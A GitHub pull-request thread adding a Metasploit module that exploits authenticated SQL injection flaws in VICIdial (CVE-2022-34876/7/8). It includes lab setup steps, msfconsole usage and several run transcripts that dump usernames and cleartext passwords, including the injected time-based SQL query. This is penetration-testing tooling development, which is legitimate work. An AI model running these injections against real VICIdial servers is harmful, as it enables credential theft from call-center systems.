VICIdial Multiple SQLi (CVE-2022-34876, CVE-2022-34877, CVE-2022-34878)

[h00die]

This PR adds a module which exploits several authenticated sqli in VICIdial. Of note, two of the modules require a permissions change (vicibox sets admin permissions to near nothing, other than the ability to change permissions).

Verification

• install vicibox (which includes vicidial and OS) per markdown instructions
• Start msfconsole
• use auxiliary/scanner/http/vicidial_multiple_sqli
• set rhosts and password
• run
• Verify you get cleartext creds
• Document looks good

[smcintyre-r7]

Drafted because this is a place holder and not ready for review.

[h00die]

Setting up this software was.... an exercise in frustration. I know I kept step by step notes and module docs, but I can't seem to find them. I'm going to take a little time to find it again before making this ready for review

[bcoles]

Setting up this software was.... an exercise in frustration. I know I kept step by step notes and module docs, but I can't seem to find them. I'm going to take a little time to find it again before making this ready for review

Maybe this will help:

https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md

Also, GOautodial and VICIbox are available as an ISO and come with VICIdial installed by default. This makes testing much easier. Also, it would be worth testing the module on VICIbox and GOautodial anyway, as this is probably one of the most common methods of VICIdial deployment [citation needed].

[jheysel-r7]

Hey @h00die, thanks for the contribution. Just wondering if you have any update on this? No worries if not. I might spin up one of the ISOs bcoles mentioned and give it a test if you think it's almost ready.

[h00die]

I don't, been busy with life and prioritizing the VMware post module work over my own module stuff. If you want to try, go for it! If not it's ok to sit here another week or two so I can get VMware buttoned up and then write this up

[jheysel-r7]

No worries at all @h00die, just checking in. I gave it a test and put together some documentation. I tried pushing up the changes to a PR on your fork but got a permissions denied error - I was likely doing something incorrectly my apologies, so it's just included below.

Durning testing 2 of the 5 actions were failing while testing against ViciBox_v9. I'll investigate a bit further today:

List Users - access_recordings method      working
List Users - agent_time_sheet method       Testing of SQLi failed. 
List Users - agentcall_email method        working
List Users - modify_email_accounts method  working
List Users - user_stats method             Testing of SQLi failed.

This module exploits several authenticated SQL Inject vulnerabilities in VICIdial 2.14b0.5 prior to
svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable)

Vulnerable Application

1. Install the following OpenSUSE 10 ISO ViciBox_v9.x86_64-9.0.3.iso:
   1. Change the default password
   2. Set Timezone, Keyboard Layout and Language
   3. Network settings should autoconfigure (Tested on VMware Fusion). Network settings can be configured with the
      command yast lan if necessary
2. Run vicibox-express to initiate the ViciDial Express Installation, everything can be kept as default
3. Navigate to http://<ip-address>/
   1. Click Administration and login with default credentials username: 6666, password: 1234
   2. Once logged in, Click "Finish setup". Everything can be kept as default.
4. The complete list of setup instructions can be found by following this link

Verification Steps

1. Start msfconsole
2. Do: use auxiliary/scanner/http/vicidial_multiple_sqli
3. Do: set username <username>
4. Do: set password <password>
5. Do show actions
   1. Select from the list or keep the default
6. Do: run
7. The module will exploit the selected SQL injection and return the extracted usernames and passwords

Scenarios

ViciBox_v9.x86_64-9.0.3 using the List Users - modify_email_accounts method:

msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
verbose => true
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
password => notpassword
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - modify_email_accounts method
action => List Users - modify_email_accounts method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run

[*] Enumerating Usernames and Password Hashes
[*] {SQLi} Executing (select group_concat(TXMlUAF) from (select cast(concat_ws(';',ifnull(user,''),ifnull(pass,'')) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
[*] {SQLi} Encoded to (select group_concat(TXMlUAF) from (select cast(concat_ws(0x3b,ifnull(user,repeat(0x87,0)),ifnull(pass,repeat(0x52,0))) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
[*] {SQLi} Time-based injection: expecting output of length 46
[!] No active DB -- Credential data will not be saved!
[+] Dumped table contents:
vicidial_users
==============

user  pass
----  ----
6666  notpassword
VDAD  donotedit
VDCL  donotedit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[jheysel-r7]

Setting up this software was.... an exercise in frustration. I know I kept step by step notes and module docs, but I can't seem to find them. I'm going to take a little time to find it again before making this ready for review

Maybe this will help:

https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md

Also, GOautodial and VICIbox are available as an ISO and come with VICIdial installed by default. This makes testing much easier. Also, it would be worth testing the module on VICIbox and GOautodial anyway, as this is probably one of the most common methods of VICIdial deployment [citation needed].

Thanks for mentioning this bcoles. @h00die for transparency I installed and setup GOautodial and the module as it's written is unable to authenticate with the application. The login URI's and authentication requirements are a bit different.

Edit: Not sure if you'll want to investigate this further. If you do, when installing GOautodial this link is useful. If not, outlining what this module has been tested on and what it is intended to work on might be sufficient.

[h00die]

not surprising about GOautodial using a different url structure. My schedule is freeing up, hoping to restart this and get it finished soon.

I used ViciBox_v10.x86_64-10.0.0.iso, not 9, so that may account for some of the modules not working as new features may have been added. When I work on the doc, i'll do 9 and 10 at the same time.

[h00die]

I think I remember vicidial being a pain because I was testing each page and API endpoint. The exploitable ones in here actually required little to nothing to setup and exploit.

[h00die]

Tested against 9.0.3 and 10.0.0, added docs, ready for real review! Also did a rebase

[h00die]

ping @jheysel-r7 just wanted to check if youd have time to get back around to this one

[jheysel-r7]

Thanks @h00die! Great module. Tested and everything looks good. I ran ruby tools/dev/msftidy_docs.rb documentation/modules/auxiliary/scanner/http/vicidial_multiple_sqli.md and made a couple of minor suggestions based on the output.

msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - access_recordings method
action => List Users - access_recordings method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run

[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============

 user  pass
 ----  ----
 6666  notpassword
 VDAD  donotedit
 VDCL  donotedit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agent_time_sheet method
action => List Users - agent_time_sheet method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run

[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============

 user  pass
 ----  ----
 6666  notpassword
 VDAD  donotedit
 VDCL  donotedit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agentcall_email method
action => List Users - agentcall_email method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run

[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============

 user  pass
 ----  ----
 6666  notpassword
 VDAD  donotedit
 VDCL  donotedit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - modify_email_accounts method
action => List Users - modify_email_accounts method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run

[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============

 user  pass
 ----  ----
 6666  notpassword
 VDAD  donotedht
 VDCL  donoDedit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - user_stats method
action => List Users - user_stats method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run

[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============

 user  pass
 ----  ----
 6666  notpassword
 VDAD  donotedit
 VDCL  donotedit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[h00die]

addressed the comments, retested on my side, should be good to ship!

[jheysel-r7]

Release Notes

This PR adds a module which exploits several authenticated sqli in VICIdial (CVE-2022-34876, CVE-2022-34877, CVE-2022-34878)